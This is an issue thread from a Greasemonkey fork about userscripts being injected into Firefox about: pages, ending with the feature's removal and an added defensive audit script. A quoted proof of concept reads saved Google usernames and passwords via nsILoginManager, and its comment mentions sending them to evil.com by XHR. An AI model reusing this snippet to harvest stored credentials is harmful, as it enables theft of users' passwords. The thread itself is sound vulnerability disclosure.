Martii / greasemonkey

Greasemonkey is a user script manager for Firefox.
http://userscripts.org/users/marti

Script injection attempted in about:addons #5

Closed Martii closed 13 years ago

Martii commented 13 years ago

Original title: Script injection attempted in about:addons

In Firefox 4.x, Greasemonkey attempts to inject a script when an @include rule is set to about:addons and the user navigates to about:addons, which also throws this warning:

Warning: assignment to undeclared variable _createItemOrig
Source File: chrome://greasemonkey/content/addons4-overlay.js
Line: 16

Sample script

// ==UserScript==
// @name          about:addons test
// @namespace     http://localhost
// @description   Tests GMs injection on about:addons
// @include  about:addons
// @include http://www.iana.org/domains/example/
// ==/UserScript==

  alert('foo');

The monkey menu also reflects this attempt as being successfully injected; however, no alert happens. It is handy to have the popup menu available; however, it shouldn't reflect nor try to inject a script at this URI.

Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0

Martii commented 13 years ago

Reported upstream at greasemonkey#1302

Martii commented 13 years ago

Monkey menu has been completely refactored and broken, as acknowledged in greasemonkey#1306, in this commit forward, thus invalidating this report. Still present in the GM 0.9.1 release.

Closing as invalidated by greasemonkey@4e5e3ec

Martii commented 13 years ago

Reported upstream in this comment as

monkey menu has been completely refactored and broken, as acknowledged in #1306, by this commit forward thus invalidated this report. Still present in GM 0.9.1 release.

Closing as invalidated-by would be a more proper tag along with commit reference.

Martii commented 13 years ago

Reopened by greasemonkey#1375

LouCypher wrote:

Steps to reproduce:
1. Enable "greasemonkey.aboutIsGreaseable" in about:config (set it to true)
2. Install this script

// ==UserScript==
// @name            Retrieving passwords via about: pages
// @namespace       http://mozilla.status.net/loucypher
// @include         about:*
// ==/UserScript==

var hostname = 'https://www.google.com';
var formSubmitURL = 'https://www.google.com';  // not http://www.example.com/foo/auth.cgi
var httprealm = null;
var username, password;

try {
  var myLoginManager = Components.classes["@mozilla.org/login-manager;1"].
                        getService(Components.interfaces.nsILoginManager);
  var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm);
  var info = "";
  for (var i = 0; i < logins.length; i++) {
    info += logins[i].username + "\n";
    info += logins[i].password + "\n\n";
  }
  //GM_log(info);
  alert(info); // show usernames and passwords for google.com
               // or send to evil.com via XHR (untested)
} catch(ex) {
  // This will only happen if there is no nsILoginManager component class
  //GM_log(ex);
}

Expected result:
User script should not have chrome privileges and should not have access to XPCOMs

Actual result:
Display usernames and passwords (could be worse)

Upstream comment

Historical issue reference:
#1302

Martii commented 13 years ago

Upstream comment

arantius wrote:
Still thinking we should just drop this feature (injecting into about:s besides blank) altogether.

In regards to security I am +1 for this. Moz and other addons are starting to create about: entries of their own and I would really rather not see user.js become a security threat to other add-ons including the Moz core. We could never really handle all of them especially if GM isn't aware of them. about:blank had some issues last time I tested it too with document.write but that was a while ago.

Martii commented 13 years ago

Closed by greasemonkey@80c62e8
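
An added example, not part of the original thread and not Greasemonkey's own code: a pre-install audit that parses a userscript's metadata block and flags any @include pattern that could match an about: page other than about:blank, the case this issue is about. The helper names are hypothetical, and the matching is a conservative approximation that assumes `*` is the only wildcard and ignores case.

```javascript
// Added example, not Greasemonkey code. Helper names are hypothetical.

// Pull the @include patterns out of the ==UserScript== metadata block.
function parseIncludes(source) {
  const block = /\/\/\s*==UserScript==([\s\S]*?)\/\/\s*==\/UserScript==/.exec(source);
  if (!block) return [];
  const includes = [];
  for (const line of block[1].split(/\r?\n/)) {
    const m = /^\s*\/\/\s*@include\s+(\S+)\s*$/.exec(line);
    if (m) includes.push(m[1]);
  }
  return includes;
}

// Conservative check: could this glob match an about: URI other than
// about:blank? Assumes '*' is the only wildcard and ignores case.
function canMatchAboutPage(pattern) {
  const p = pattern.toLowerCase();
  if (p === 'about:blank') return false; // the only about: page left alone
  const prefix = p.split('*')[0]; // literal text before the first wildcard
  if (prefix.length === p.length) return p.startsWith('about:'); // no wildcard
  // With a wildcard, the literal prefix must be compatible with "about:".
  return 'about:'.startsWith(prefix) || prefix.startsWith('about:');
}

// Return the @include patterns that deserve review before install.
function auditScript(source) {
  return parseIncludes(source).filter(canMatchAboutPage);
}

// Constructed sample input, modelled on the headers quoted in this thread.
const SAMPLE = [
  '// ==UserScript==',
  '// @name     sample',
  '// @include  about:*',
  '// @include  about:blank',
  '// @include  http://www.iana.org/domains/example/',
  '// ==/UserScript==',
  "alert('foo');",
].join('\n');

console.log(auditScript(SAMPLE));
```

A bare `*` pattern is flagged as well, since it matches every URI, about: pages included.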